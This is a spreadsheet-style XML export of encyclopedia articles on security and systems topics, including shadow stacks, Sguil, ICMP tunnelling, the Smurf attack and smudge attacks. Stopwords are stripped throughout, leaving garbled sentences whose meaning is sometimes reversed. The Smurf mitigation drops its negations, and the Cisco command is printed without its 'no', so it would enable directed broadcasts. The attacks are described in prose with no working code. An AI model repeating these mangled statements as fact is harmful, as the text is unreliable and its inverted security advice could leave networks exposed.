ioccc, listed described calculated bets: computers, gambling, mathematical modeling (2001) shown below: this program needs following command line linux system compiled: banks.c banks -dit=xk_page_up -ddt=xk_page_down -dup=xk_up -ddn=xk_down -dlt=xk_left -drt=xk_right -dcs=xk_return -ddt=0.02 -lx11 -l/usr/x11r6/lib order binary file (banks) supplied scenery file stdin input: akari below 2011 entry downsamples ascii image don, yang: program using source input, result also obfuscated perl contest underhanded contest esoteric programming language notes references external links official website</t>
  </si>
  <si>
    <t>Shadow stack</t>
  </si>
  <si>
    <t>computer security, shadow stack mechanism protecting procedure's stored return address, stack buffer overflow. shadow stack second, separate stack "shadows" program call stack. function prologue, function stores return address call stack shadow stack. function epilogue, function loads return address call stack shadow stack, compares them. records return address differ, attack detected; typical course action simply terminate program alert system administrators possible intrusion attempt. shadow stack similar stack canaries mechanisms maintain control-flow integrity protected program detecting attacks tamper stored return address attacker exploitation attempt. shadow stacks implemented recompiling programs modified prologues epilogues, dynamic binary rewriting techniques achieve effect, hardware support. unlike call stack, also stores local program variables, passed arguments, spilled registers data, shadow stack typically stores second copy function's return address. shadow stacks provide protection return addresses stack canaries, rely secrecy canary value vulnerable non-contiguous write attacks. shadow stacks protected guard pages information hiding, attacker would also need locate shadow stack overwrite return address stored there. like stack canaries, shadow stacks protect stack data return addresses, offer incomplete protection security vulnerabilities result memory safety errors. 2016, intel announced upcoming hardware support shadow stacks control-flow enforcement technology.shadow stacks face compatibility problems. after program throws exception longjmp occurs, return address shadow stack match return address popped call stack. typical solution problem entries shadow stack matching return address found, terminate program match found shadow stack.a multithreaded program, would call stack executing thread, would also shadow stack shadowing call stacks. also call stack return address buffer overflow references</t>
  </si>
  <si>
    <t>Internet Authentication Service</t>
  </si>
  <si>
    <t>internet authentication service (ias) component windows server operating systems provides centralized user authentication, authorization accounting. overview while routing remote access service (rras) security sufficient small networks, larger companies often need dedicated infrastructure authentication. radius standard dedicated authentication servers. windows 2000 server windows server 2003 include internet authentication service (ias), implementation radius server. supports authentication windows-based clients, well third-party clients adhere radius standard. stores authentication information active directory, managed remote access policies. first showed windows windows option pack microsoft commercial internet system (mcis) 2.5. while requires additional server component, provides number advantages standard methods rras authentication. these advantages include centralized authentication users, auditing accounting features, scalability, seamless integration existing features rras. windows server 2008, network policy server (nps) replaces internet authentication service (ias). performs functions windows server 2003 802.1x-based wireless wired connections performs health evaluation granting either unlimited limited access network access protection clients. logging default, logs local files (%systemroot%\logfiles\ias\*) though configured well place of). when logging sql, appears wrap data xml, calls stored procedure report_event, passing data text... stored procedure unwrap save data desired user. history initial version internet authentication service included windows option pack. windows 2000 server's implementation added support intelligent resolution user names part windows server domain, support utf-8 logging, improved security. also added support authentication ieee 802.1x networks. later added peap (with service pack windows server 2003's implementation introduces support logging microsoft server database, cross-forest authentication (for active directory user accounts forests server's forest cross-forest trust relationship with, confused domain trust feature since nt4), support ieee 802.1x port-based authentication, features.all versions support multi domain setups. only windows server 2003 supports cross forest. while version includes radius proxy, windows 2000 feature. windows server 2003 reintroduced feature capable intelligently proxy, load balance, tolerate faults faulty unreachable back-end servers. references external links deploying internet authentication service (ias) windows 2003 internet authentication service microsoft windows 2000 resource article describing (radius) dhcp configure radius secure 802.1x wireless archive.today (archived 2012-12-06) self-sign radius server secure peap eap-ttls authentication archive.today (archived 2012-12-05) parsing utility. allows visualize files</t>
  </si>
  <si>
    <t>Shade sandbox</t>
  </si>
  <si>
    <t>shade sandbox sandbox-based isolation program developed eugene balabanov. shade distributed consumers shareware solution. creates isolated virtual environment within computer: rather running software browsing internet directly, instead perform actions fenced-off safe area. this mechanism creates highly controlled environment running untested untrustworthy apps without threatening host operating system. architecture shade sandbox basically plugin engine, also developed eugene balabanov enables developers build security-related solutions file monitors utilities and, course, virtual environments. platform available corporate customers. these capabilities platform provides plugins: control file system operations control registry operations injection mechanism plugins could alter processes behavior. instance, shade exploits capability draw frame "shaded" application windows reception findmysoft rated shade sandbox stars, naming essential softpedia describes shade "simple, reliable anti-virus protection" also sandbox (computer security) application virtualization deep freeze sandboxie plus references external links official website "shade antimalware- review". malwaretips.com. 2015-10-10. retrieved 2022-07-02.</t>
  </si>
  <si>
    <t>Sguil</t>
  </si>
  <si>
    <t>sguil (pronounced sgweel squeal) collection free software components network security monitoring (nsm) event driven analysis alerts. sguil client written tcl/tk operating system supports these. sguil integrates alert data snort, session data sancp, full content data second instance snort running packet logger mode. sguil implementation network security monitoring system. defined "collection, analysis, escalation indications warnings detect respond intrusions." sguil released 3.0. tools make sguil also sagan intrusion detection system (ids) intrusion prevention system (ips) network intrusion detection system (nids) metasploit project nmap host-based intrusion detection system comparison references external links sguil homepage</t>
  </si>
  <si>
    <t>SetACL</t>
  </si>
  <si>
    <t>setacl freeware utility manipulating security descriptors microsoft windows. used available lesser general public license (lgpl) command-line utility activex component, changed freeware license version 3.0.0.0. features this list features taken product's page. supports following object types windows 2000 later ntfs files directories registry keys printers services network shares objects manage permissions local remote systems domains workgroups. multiple permissions multiple users groups single command. control permissions inherited. list, backup restore permissions. operations work single object recursively directory registry tree. owner user group. unicode support. remove, replace copy user group acl. fast performance time-consuming steps recursing large file system performed once. filter object names processed. usage 'change' permissions directory 'c:\angela' user 'brian' domain 'dom1': remove write change permission sets desktop, replace 'read execute' permissions: example autoit found here. short history march 2001 setacl program development begins december 2002 setacl program development begins april 2003 beta released july 2003 final released september 2003 2.0.1.0 released remove, replace copy access control entries (aces) belonging users groups specified domain. january 2004 2.0.2 released activex support. used language supports including autoit, visual basic, perl, vbscript. 2008 2.0.3 released 64-bit support august 2010 released improved permission listing references</t>
  </si>
  <si>
    <t>Session replay</t>
  </si>
  <si>
    <t>session replay ability replay visitor's journey site within mobile application application. replay include user's view (browser screen output), user input (keyboard mouse inputs), logs network events console logs. session replay supposed help improve customer experience help identify obstacles conversion processes websites. however, also used study website's usability, customer behavior, handling customer service questions customer journey, interactions, replayed. some organizations also capability analyse fraudulent behavior websites. some solutions augment session replay advanced analytics identify segments customers struggling website. this allows replay capability used much efficiently reduces need replay customer sessions unnecessarily. there generally ways capture replay visitor sessions, client side tag-free server side. client side there many tag-based solutions offer video-like replay visitor's session. while replay analogous video, accurately reproduction specific user's experience detailing mouse movements, clicks, taps, scrolls. underlying data session recordings captured tagging pages. some advanced tools able access document object model (dom) directly play back interactions within including mutations high degree accuracy. there number tools provide similar functions, advantage able replay entire client experience movie-like format. also deal modern single-page applications. disadvantage tracking script easily detected blocked blocker become normal (2017: 615m devices active adblock). tag-free server side these solutions capture website traffic replay every visitor interaction every device, include mobile users location. sessions replayed step-by-step, providing ability search, locate analyze aspects visitor's session including clicks form entry. server-side solutions require hardware software installed premises." advantage server-side recording solution cannot blocked. however, able video-like replay client-side activities scrolling mouse movements. this also poorly handles modern single-page applications. hybrid: tag-free server side combined client-side tracking hybrid approach combines advantages without weaknesses. hybrid approach ensures every session recorded (important compliance) server-side capturing enriched client-side tracking data mouse movements, clicks, scrolling, keystrokes, user behavior (driven customer experience insights). this approach works well modern single-page applications. there presence movie-like replay 100% compliant capturing. this deployed either premises" software service (saas). tools listed available software service (saas) solutions. also macro recorder replay attack sniffing attack data privacy external links list session replay vendors (updated december 2019) list websites “session replay” scripts (princeton university 2017) session replay works session-replay: viele beliebte webseiten zeichnen jegliche texteingabe references session replay—how works what used for. hybrid session recording replay solution regulated industries used ensure compliance, detect fraud improve customer experience qumram session replay support customer experience analytics guide session replays product managers what session replay? comparing best user session recording tool clarisite rebrands glassbox announces appointment leadership team members</t>
  </si>
  <si>
    <t>Intruder detection</t>
  </si>
  <si>
    <t>information security, intruder detection process detecting intruders behind attacks unique persons. this technique tries identify person behind attack analyzing computational behaviour. this concept sometimes confused intrusion detection (also known ids) techniques detecting intruder actions. history some earlier works reference concept intruder authentication, intruder verification, intruder classification, project first projects deal full scope concept. theory intruder detection systems detect attacking system analyzing computational behaviour biometric behaviour. some parameters used identify intruder keystroke dynamics (aka keystroke patterns, typing pattern, typing behaviour) patterns using interactive command interpreter: commands used commands sequence accessed directories character deletion patterns network usage: address used country city ports used analysis operating system used attack protocols used connection times patterns keystroke dynamics keystroke dynamics paramount intruder detection techniques parameter classified real 'behavioural biometric pattern'. keystroke dynamics analyze times keystrokes issued computer keyboard cellular phone keypad searching patterns. first techniques used statistics probability concepts like 'standard deviations' 'mean', later approaches data mining, neural networks, support vector machine, etc. translation confusion there confusion spanish translation 'intrusion detection system', also known ids. some people translate 'sistemas detección intrusiones', others translate 'sistemas detección intrusos'. only former correct. also intrusion detection intrusion-detection system biometrics external links fingerprinting tool paranoid project</t>
  </si>
  <si>
    <t>InterMezzo (file system)</t>
  </si>
  <si>
    <t>intermezzo distributed file system written linux kernel, distributed general public license. included standard linux kernel version 2.4.15 dropped version 2.6. intermezzo designed work existing journaling file system ext3, jfs, reiserfs xfs. developed around 1999. intermezzo system consists server, holds master copy file system, clients cache file system. works either replication mode, client maintains duplicate entire file system, on-demand mode client requests files needs. capturing writes server's file system journal streaming client systems replayed. intermezzo described "high availability file system" since client continue operate even connection server lost. during period disconnection, updates logged propagated connection restored. conflicts detected handled according "conflict resolution policy" (although best policy likely avoid conflicts). typical applications replication mode are: cluster servers operating shared file system. computers always connected network, laptops.typical applications on-demand mode distributed file serving, file transfer protocol (ftp) www, desktop workstations. intermezzo started part coda file system project carnegie mellon university took many design decisions coda (but share code). coda turn branch openafs project. designed enhanced scalability, performance, modularity, easy integration existing file systems. paper presented open source convention august 1999 peter braam, michael callahan, phil schwan. company called stelias computing created site late 1999, announced "beta" test version january 2000.although supported standard linux kernel version 2.4, intermezzo removed series. developers moved project named lustre company called cluster file systems, around 2001. development continued 2003, site maintained 2008. also rsync coda lustre references external links debian report logs intermezzo, mentioning lustre.</t>
  </si>
  <si>
    <t>Hacking: The Art of Exploitation</t>
  </si>
  <si>
    <t>hacking: exploitation (isbn 1-59327-007-0) book "smibbs" erickson computer security network security. published starch press 2003, second edition 2008. examples book developed, compiled, tested gentoo linux. author background information erickson computer security expert, background computer science. 2011, worked vulnerability researcher computer security specialist california. bootable included book provides linux-based programming debugging environment users. content edition content exploiting moves programming, networking, cryptography. book notable measure real-world examples; discussions rarely bring specific worms exploits. programming computer programming portion hacking takes half book. this section goes development, design, construction, testing exploit code, thus involves basic assembly programming. demonstrated attacks range simple buffer overflows stack complex techniques involving overwriting global offset table. while erickson discusses countermeasures non-executable stack evade return-to-libc attacks, dive deeper matters without known guaranteed exploits address space layout randomization. book also cover openwall, grsecurity, projects, kernel exploits. networking networking segment hacking explains basics model basic networking concepts, including packet sniffing, connection hijacking, denial service port scanning. cryptology cryptology section hacking covers basic information theory, addition symmetric asymmetric encryption. winds cracking utilizing fluhrer, mantin, shamir attack. besides basics, including man-in-the-middle attacks, dictionary attacks, john ripper; hacking discusses quantum distribution, grover's quantum search algorithm, peter shor's quantum factoring algorithm breaking encryption using large quantum computer. other details front cover hacking complete cycle, reverse engineering carrying attack, developing exploit program dies buffer overflow long command line arguments. content edition introduction introduction book states hacking done within confines law, productive reasons. 0x200 programming programming chapter book, different types programs described shown examples. chapter covers control structures basic aspects programming. live provides environment reader follow along examples book programming themselves. 0x300 exploitation exploitation taking computer's code rules changing computer want finding ways holes system change important part exploitation. this chapter covers exploit techniques memory corruption, buffer overflows format strings, especially using perl bash shellcode. 0x400 networking model communication among computers networking model used. model model provides standards computers communicate. there seven layers model physical layer, data-link layer, network layer, transport layer, session layer, presentation layer, application layer. each packet computer sends another computer must layer model. sockets standard communicate network computer operating systems socket. socket used programmer create send receive data using layers osi. there types sockets: stream socket datagram socket. stream sockets transmission control protocol (tcp). datagram socket uses user datagram protocol (udp). peeling back layers 'peeling back layers' describes layers actually work. model described great detail images book make easy understand. network sniffing switched unswitched networks exist networking. switched network uses devices called switches analyze tell packets travelling network endpoint unswitched network free flow packets without stopped analyzed. sniffing refers using program allows packets network going. denial service denial service attack attempt make computer resource unavailable intended users. this means denial service attack sends large quantity communication requests intended resource order overflow resource becomes unusable certain period time. these types attacks usually directed routers firewalls order shut gain access computers network. router susceptible types attacks firewall usually handle attack unaffected. distributed denial service attack communication requests come multiple computers, greatly increasing number requests regular denial service attack. some types attacks include ping death, teardrop, ping flooding, amplification attacks. tcp/ip hijacking tcp/ip hijacking another uses spoofed packets take connection victim host machine. this technique mainly used collect passwords host machine uses password connected when type attack takes place victim attacker must network. another form tcp/ip hijacking hijacking, involves injecting fake reset packet. port scanningport scanning simply figure ports accepting listening connections. hacker would program lets know ports open scanning ports network trying open them. there many type scans, syn, idle, fin, x-mas, null scans. reach hack someone this part finding vulnerabilities typecasting network. using debugger lines code used network protocols efficient accomplish this. 0x500 shellcode shellcode used exploitation code. like hacker's code wants gains control program. usually hacker find exploit programs code able insert code (shellcode) found exploit. assembly cassembly differs assembly low-level programming language, processed communicate directly processor. when using high-level programming language, code must compiled sent kernel making system call, making call processor. words, almost like taking system calling kernel picture using assembly.the path shellcode this part shellcode inject program shellcode taken over. there many examples code book ways accomplish task. self-spawning shellcode spawning shellcode code enabled exploit found. shellcode able vulnerability found program. best accomplish shown book making sure code small. port-binding shellcode this type shellcode attaches network port. once bound port listen connection. after finds connection programming involved shown vividly book. connect-back shellcode this type shellcode mainly used getting around firewalls. most firewalls going block port-binding shellcode working allow known services active ports. connect-back shellcode initiates connection back hacker's address coming firewall instead going once code book depicts connect-back shellcode ways accomplish this. 0x600 countermeasures this part book defenses intrusion prevention systems stop known hacking exploits. countermeasures that detect administrator network aware exploit occurring. using certain tools like reading logs packet sniffing network ways catch exploits occur. system daemons system daemon server program unix system receives accepts incoming connections. daemon program runs background detaches controlling terminal certain way. point book code shown daemon program. signals also used unix-based environment make operating system calls. when signal type terminal immediately send interrupt message complete task whatever signal typed. uses signals displayed coding examples book. tools trade hacker certain tools needs help exploiting. exploit script tool uses already written exploit code find holes system program. using exploit scripts easy even non-hacker code already written couple exams exploit tools shown book them. files stated earlier files check events happening computer network. hacker, ability change file says help noticed. there code directions change files book. overlooking obvious another sign program hacked longer work correctly. most time programs work correctly hacker modified accomplish another task. skilled hacker however modify program still works correctly wants program exploited ways tell happened. finding program exploited tedious process since usually starts taking parts program looking individually. putting exploited program back together exploited shown book. advanced camouflage when hacker exploiting program address written file. camouflaging files address detected shown book. when address hidden, called spoofing address. whole infrastructure intrusion detection systems intrusion prevention systems greatly helps avoid risk exploited. even firewalls routers files show evidence hacking. making sure outbound connections cannot processed limit found. ways shown book connections easier undetected. payload smuggling when using shellcode exploit programs, caught intrusion detection systems. usually intrusion detection system catch programs already written noticeable shell code them. most exploit programs caught real hackers using them. there ways hide shellcode harder detect. couple examples hide shellcode found book. buffer restrictions sometimes restrictions buffers vulnerabilities cannot exploited. there ways book depicts around buffer restrictions. hardening countermeasures exploits found book around long time. took hackers figured take advantage vulnerabilities described book. memory corruption, change control, shellcode three easiest steps exploitation. nonexecutable stack most applications stack type executing. defense make stack non-executable buffer overflows cannot used exploitation program. this defense effective stopping shellcode application. however, around non-executable stack shown described book. randomized stack space randomized stack type countermeasure used hacker unable tell shellcode implemented randomizes memory layout within stack. once again, also around countermeasure examples book. 0x700 cryptology cryptology communicating secretly ciphers, cryptanalysis process cracking deciphering secret communications. this chapter offers information theory cryptology, including work claude shannon, concepts including unconditional security, one-time pads, quantum distribution, computational security. using encrypt decrypt messages symmetric encryption. asymmetric encryption involves using different keys (public private). this chapter gives examples kinds encryption, them. cipher encryption algorithm. combining symmetric cipher asymmetric cipher called hybrid cipher. ways attack ciphers around encryption methods shown described book. chapter also shows methods figure encrypted passwords, including brute-force attacks hash look-ups. also offers methods around wireless 802.11b (wi-fi) wired equivalent privacy (wep) encryption. also computer security network security references other sources erickson, jon. hacking: exploitation. starch press, 2003. isbn 1-59327-007-0 john baichtal (march 2008). "geekdad review: hacking: exploitation". wired. retrieved march 2009.</t>
  </si>
  <si>
    <t>ICMP tunnel</t>
  </si>
  <si>
    <t>icmp tunnel establishes covert connection remote computers client proxy), using icmp echo requests reply packets. example technique tunneling complete traffic ping requests replies. technical details icmp tunneling works injecting arbitrary data echo packet sent remote computer. remote computer replies manner, injecting answer another icmp packet sending back. client performs communication using icmp echo request packets, proxy uses echo reply packets. theory, possible proxy echo request packets (which makes implementation much easier), packets necessarily forwarded client, client could behind translated address (nat). this bidirectional data flow abstracted ordinary serial line. icmp tunneling possible 792, defines structure icmp packets, allows arbitrary data length type (echo reply) (echo message) icmp packets. uses icmp tunneling used bypass firewalls rules obfuscation actual traffic. depending implementation icmp tunneling software, type connection also categorized encrypted communication channel computers. without proper deep packet inspection review, network administrators able detect type traffic network. mitigation prevent type tunneling block icmp traffic, cost losing network functionality people usually take granted (e.g. might take tens seconds determine peer offline, rather almost instantaneously). another method mitigating type attack allow fixed sized icmp packets firewalls, impede eliminate type behavior.icmp-tunnels sometimes used circumvent firewalls block traffic outside world. example, commercial wifi services require user usage, library requires user first portal. network operator made erroneous assumption enough block normal transport protocols like udp, core protocols icmp, sometimes possible icmp-tunnel access internet despite authorized network access. encryption per-user rules disallows users exchange icmp packets (and types packets, maybe using ieee 802.1x) external peers authorization solves problem. also icmpv6 smurf attack references external links 792, internet control message protocol itun simple icmp tunnel hans icmp tunnel linux (server client) macosx (client only) icmp-shell telnet-like protocol using icmp pingtunnel tunnel icmp icmp crafting stuart thomas using icmp tunneling tool ping tunnel project loki article ping tunneling phrack icmp tunnel source code icmptunnel icmp tunnel dhaval kapil</t>
  </si>
  <si>
    <t>IBM Tivoli Storage Manager</t>
  </si>
  <si>
    <t>spectrum protect (tivoli storage manager) data protection platform gives enterprises single point control administration backup recovery. flagship product spectrum protect (tivoli storage manager) family. enables backups recovery virtual, physical cloud environments sizes. this product part spectrum software defined storage suite products unrelated tivoli management framework. history descended project done ibm's almaden research center around 1988 back vm/cms systems. first product emerged workstation data save facility (wdsf). wdsf's original purpose back pc/dos, os/2, workstation data onto vm/cms (and later mvs) server. wdsf morphed adstar distributed storage manager (adsm) re-branded tivoli storage manager 1999. database (through release 5.5) bespoke tree database; although database uses many underlying technologies ibm's db2, engine (for read-only use), supports access odbc, database architectural limit approximately space. starting 6.1, released 2009, uses instance database (thus eliminating architectural limitations previous database). product details maintains relational database (limit 534gb v5.5, v6.3.3+) recovery (aka transaction log, limit v5.5, 128gb v6.1+) logging, configuration, statistical information, object metadata. v5.5 pages always 4kb, partitions every 4mb. single inserts only. average, 20gb space consumed every million objects. shallow directory structures less space deeper paths. this database generally queried emulated sql-98 compliant interface, undocumented show, create delete commands. actual user data managed cascading hierarchy storage media (primary storage pools) presented devices (unix), filesystem containers (windows linux), streaming tape optical media. additionally, emulated tape virtual tape library centera worm archival device supported. duplicate copies (backupsets copy storage pools) subset data created sequential media redundancy off-site management. release server supported aix, hp-ux, linux, solaris, windows server, z/os. client release supported netware, macos, aix, hp-ux, linux, z/os, solaris, windows 32/64-bit. release server supported aix, hp-ux, linux, solaris, windows server, client supported operating systems 5.5. october 2011, released. components tivoli storage manager system made several different components. major components include: server, client, storage agent, data protector, operation center administration center. data sources common data source client ("tsm backup/archive client" "b/a client"). client allows backup restore data "selectively" "incrementally", generally known "progressive incremental" "incremental forever", unique client+filespace+path+file combination separately tracked retention. further, separate method provided client known archive (and retrieve). this method generates groupings objects retained single unit. this still differs traditional full/incremental style backup products files stored separately smaller aggregates rather monolithic image. additionally, provision incremental archive. other data injectors include policy-based hierarchical storage management (hsm) components aix, linux windows. these allow migration data production disk storage hierarchies maintaining transparent access data dmapi ntfs reparse points. general parallel file system (gpfs) storage tier gpfs' information lifecycle management (ilm) provides gpfs filesystem. gpfs filesystem simultaneously accessed multiple servers running linux, windows, using gpfs filesystem software installed operating system platforms. gpfs provides transparent access data whether online disk migrated tape requesting file saves retrieves tsm. additionally, many applications provide provided connections allowing storage databases, mail systems, system backups even arbitrary user data within tsm's repository. aside tsm's unix product, "backup" "archive" management facilities accessed client api. agents architecture makes special-purpose agents. lan-free storage agent limited function server configured library client uses server-to-server communication coordinate storage resources configured also presented storage agent. usually lan-free server-free backup agent installed specific client; however, network accessible could utilized bypass network bottlenecks. example would connect infiniband bladecenter chassis, attachment tape, not. this could bypass limited ethernet bandwidth without move server instance. ndmp agent used netapp devices network attached storage (nas) devices allow backup access appliance rather back device attached client.appliance direct access shared tape. administration administrative functions accessed administrative command line interface tool based portal application known operations center. there also third-party admin clients like tsmmanager power administrator tsm. subproducts other products enterprise edition features disaster recovery manager (drm) commands management offsite secondary copies data, database backups required access media, configuration data required recover database case loss. ndmp marketing name enterprise edition (tsm features allowing lan-free backups network attached storage (nas). specifically, netapp filers celerra datamovers supported; however, ndmp ndmp client likely functional. storage archive manager marketing name features help maintain archive retention regulatory purposes. associated products ibm's naming convention prefix every product name "ibm tivoli storage manager"; products require additional license. also tivoli storage manager fastback information ibm's product block-level, continuous data protection. client backup/archive client major operating systems supported versions server major server operating systems advanced copy services (formerly itsm hardware) hardware-based snapshots major database backups. although still exists product today newer releases re-branded (flashcopy manager). copy services windows snapshots exchange mssql. databases oracle rman tool mssql backups. data retention client manage long-term archiving data. enterprise resource planning allows online backup stored oracle db2. formerly backint developed germany enterprise service division (esd) "support offering" back directly tsm. this product acquired tivoli tivoli data protection r/3. mail external applications lotus domino (aka notes) microsoft exchange online backups. sharepoint repackaged copy docave, still marketed avepoint. space management (hsm) linux aix. automatically moves inactive data less expensive media frees online disk space important active data. windows product ("ibm windows") openstore file servers produced intercope gmbh. storage area networks (san) "lan free storage agent" modified version server itself, offering local database. configuration purely server-to-server library sharing. this allows agent write tapes managed primary server without pass data network. system backup recovery standalone product bare metal recovery. original name sysback/6000, produced tony johnson 1990s sold service offering global services. sysback back restore files, filesystems, volume groups, entire systems local remote disk, local remote tape, servers, tsm. current versions also recover systems files backed using client. there major branch product. when tony johnson left 1998, started company product named storix. storix feature rich supports linux, management interface, similar origins sysback. storix actively competes ibm's sysback differing price structures features. virtual environments provides advanced data protection flexible recovery options vmware vsphere esxi servers. interface products tivoli storage manager operational reporting portion microsoft management console (mmc) plug-in windows generate webpages email queries simple processing data. custom added; however, reporting tool provides trending graphing functionality. this seen major faults tsm. power administrator complete easy administration, management, monitoring, reporting error analysis environments. includes report builder define custom reports many different performance elements. capable sending snmp traps emails messages, generated reports, even trouble tickets. operator (otsm) debriefing software's windows based managing servers. allows easy handling offsite volumes animated step-by-step instructions. tsmexplorer easy comfortable product managing monitoring tivoli storage manager. product allows manage many servers single sign-on. written java using widget toolkit. wizards storage portal debriefing software's cloud based monitoring reporting tool (san volume controller). includes 24x7 monitoring, user defined dashboards, graphic reporting, remote tsm-management integration operator tsm. non-tivoli clients adint developed germany enterprise service division (esd) "support offering" back maxdb directly tsm. adsmpipe unsupported tool provided redbook site piping data directly tsm. commonly used back mysql archive backup client openvms product storserver inc. back openvms systems tsm. with back archive, restore, query manage openvms files stored servers logical extension on-line openvms ods-2 ods-5 file systems. caminosoft managed server hsm, tivoli edition hierarchical storage management software file system archiving seldom accessed files tsm. supports series, netapp, windows, linux, netware. cbmr/tbmr product cristie sold bare metal restore (bmr) tool linux, solaris, windows using datastore. protection mariadb database protection software, snapshot, backup, restore mariadb database using spectrum protect. protection mongodb database protection software, snapshot, backup, restore mongodb database using spectrum protect. protection mysql database protection software, snapshot, backup, restore mysql database using spectrum protect. protection postgresql database protection software, snapshot, backup, restore postgresql database using spectrum protect. protection database protection software, snapshot, backup, restore adaptive enterprise database using spectrum protect. protection database protection software, snapshot, backup, restore server database using spectrum protect. major internally developed product, contains direct connection api. sql-backtrack product software back variety database products tsm. storserver data protection oracle openvms product storserver inc. back oracle databases openvms tsm. storserver appliance vmware consolidated backup product storserver inc. back vmware servers. spfs filesystem spectrum protect product spictera. backup kvm, postgresql, mongodb, mariadb, mysql, openedge, ase, server, ingres, firebirdsql, cassandra, hana, redis, oracle, elasticsearch, db2, neo4j, server express, anywhere, greenplum spectrum protect servers mounting filespaces anywhere servers. tapetrack tape management framework tape tracking software product interfaces provide end-to-end asset management tape volumes. sold gazillabyte llc. zmanda recovery manager mysql backup product integrated provided zmanda also list backup software adstar tape management system references</t>
  </si>
  <si>
    <t>Smurf attack</t>
  </si>
  <si>
    <t>smurf attack distributed denial-of-service attack large numbers internet control message protocol (icmp) packets intended victim's spoofed source broadcast computer network using broadcast address. most devices network will, default, respond sending reply source address. number machines network receive respond packets large, victim's computer flooded traffic. this slow victim's computer point becomes impossible work history original smurf written moschuk, tfreak.in late 1990s, many networks would participate smurf attacks prompted (that would respond icmp requests sent broadcast addresses). name comes idea small, numerous attackers overwhelming much larger opponent (see smurfs). today, administrators make network immune abuse; therefore, networks remain vulnerable smurf attacks. attack amplification factors smurf amplifier computer network lends used smurf attack. smurf amplifiers worsen severity smurf attack configured generate large number icmp replies victim spoofed source address. attack amplification factor (aaf) term coined sanjeev kumar, professor university texas published paper represent degree bandwidth enhancement amplification original attack traffic undergoes (with help smurf amplifiers) transmission towards victim computer.under assumption countermeasures taken dampen effect smurf attack, happens target network active hosts (that respond icmp echo requests). icmp echo request packets spoofed source address (the smurfs' target) destination address (the patsy; apparent source attack). both addresses take forms: unicast broadcast. dual unicast form comparable regular ping: icmp echo request sent patsy single host), sends single icmp echo reply smurf) back target (the single host source address). this type attack amplification factor means: single smurf ping. when target unicast address destination broadcast address target's network, hosts network receive echo request. return reply target, target swamped smurfs. amplification factor small, host hindered crippled. large, host come halt. target broadcast address patsy unicast address, host network receive single smurf ping, amplification factor host, factor network. generally, network would able cope form attack, great. when source destination address original packet broadcast address target network, things start hand quickly. hosts receive echo request, replies broadcast hosts. each host receive initial ping, broadcast reply reply hosts. amplification factor single host, amplification factor network. icmp echo requests typically sent second. reply contain contents request; bytes, normally. single (double broadcast) ping network hosts causes network process 10000 packets. payload ping increased 15000 bytes full packets ethernet) ping cause network process 100000 large packets second. send packets second, network would collapse load. this render host network unreachable long attack lasts. mitigation two-fold: configure hosts routers ignore packets source address broadcast address; configure routers forward packets directed broadcast addresses. until 1999, standards required routers forward packets default. since then, default standard changed forward packets.it's also important isps implement ingress filtering, rejects attacking packets basis forged source address. mitigation cisco router example configuring router forward packets broadcast addresses, cisco router, router(config-if)# directed-broadcast(this example protect network becoming target smurf attack; merely prevents network participating smurf attack.) fraggle attack fraggle attack variation smurf attack attacker sends large amount traffic ports (echo) (chargen) works similarly smurf attack many computers network respond traffic sending traffic back spoofed source victim, flooding traffic.fraggle.c, source code attack, also released tfreak. also ping flood references kumar, "smurf-based distributed denial service (ddos) attack amplification internet," second international conference internet monitoring protection (icimp 2007), jose, usa, 2007, 25-25, doi: 10.1109/icimp.2007.42. external links securing cisco routers directed-broadcast smurf amplifier registry</t>
  </si>
  <si>
    <t>Smurf Amplifier Registry</t>
  </si>
  <si>
    <t>smurf amplifier registry blacklist networks internet misconfigured used smurf amplifiers smurf denial service attacks. probe networks vulnerability smurf amplification, either database, remove database, depending result test. external links smurf amplifier registry</t>
  </si>
  <si>
    <t>Smudge attack</t>
  </si>
  <si>
    <t>smudge attack information extraction attack discerns password input touchscreen device cell phone tablet computer fingerprint smudges. team researchers university pennsylvania first investigate type attack 2010. attack occurs unauthorized user possession nearby device interest. attacker relies detecting oily smudges produced left behind user's fingers find pattern code needed access device contents. simple cameras, lights, fingerprint powder, image processing software used capture fingerprint deposits created user unlocks device. under proper lighting camera settings, finger smudges easily detected, heaviest smudges used infer frequent input swipes taps user.smudge attacks particularly successful performed devices offer personal identification numbers (pins), text-based passwords, pattern-based passwords locking options. there various proposed countermeasures mitigate attacks, biometrics, tinylock, smudgesafe, different authentication schemes. many methods provide ways either cover smudges using stroking method implement randomized changes previous logins different current input. background smudge attack method smartphone touch screens first investigated team university pennsylvania researchers reported usenix workshop offensive technologies. team classified attack physical side-channel attack side-channel launched interactions finger touchscreen. research widely covered technical press, including reports pro, zdnet, engadget. researchers used smudges left behind android smartphones able break password fully time partially time proper conditions.once threat recognized, whisper systems introduced 2011 mitigate risk. provided versions pattern lock authentication required users complete certain tasks cover smudges created authentication process. verification option, number options vertically lined-up, user required swipe downward smudged area. pattern lock, presented 10x10 grid stars users swipe highlight accessing home screen. dangers interpreting smudges screen relatively easy task attackers, ramifications attack negatively affect victim. smudge attack approach could also applied touchscreen devices besides mobile phones require unlocking procedure, automated teller machines (atms), home locking devices, entry systems convenience stores. those touchscreen devices machines contain store personal information risk data breaches. human tendency minimal easy-to-remember pins patterns also lead weak passwords, passwords weak password subspaces increase ease attackers decode smudges. smudge attacks particularly dangerous since fingerprint smudges hard remove touchscreens, persistence fingerprints increases threat attack. attack depend finding perfect smudge prints, still possible attackers figure password even cleaning screen clothing overlapping fingerprints. paper, "boosting guessing attack performance android lock patterns smudge attacks," tested attack method called smug combined smudge attacks pure guessing attacks. they found even users asked facebook unlocking device, 31.94% phones cracked accessed.another danger smudge attacks basic equipment needed perform attack, camera lights, easily obtainable. fingerprint kits also accessible additional, required, piece equipment ranging $30-$200. these kits increase ease attacker successfully break phone possession. types attackers team university pennsylvania identified considered types attackers: passive active. active active attacker classified someone device hand control lighting setup angles. these attackers alter touchscreen better identify pattern code cleaning using fingerprint powder. typical setup active attacker could include mounted camera, phone placed surface, single light source. slight variations setup include type size light source distance camera phone. experienced attacker would closer attention angle light camera, lighting source, type camera lens used best picture, taking account shadows highlights light reflects. passive passive attacker observer device hand instead perform eavesdropping-type attack. this means wait right opportunity collect fingerprint images possession gadget. passive attacker control lighting source, angle, position phone, condition touchscreen. they dependent authorized user location good quality picture crack security code later methods techniques there different steps techniques attackers isolate fingerprint smudges determine lock pattern pin. attacker first identify exact touch screen area, relevant smudges within area, possible combination pattern segments. preprocessing cases fingerprints super visible eye, preprocessing used identify intact fingerprints determined number ridge details have. selecting fingerprints ridge details differentiates user's fingerprints device shared. when pressing finger touch screen surface create fingerprint, 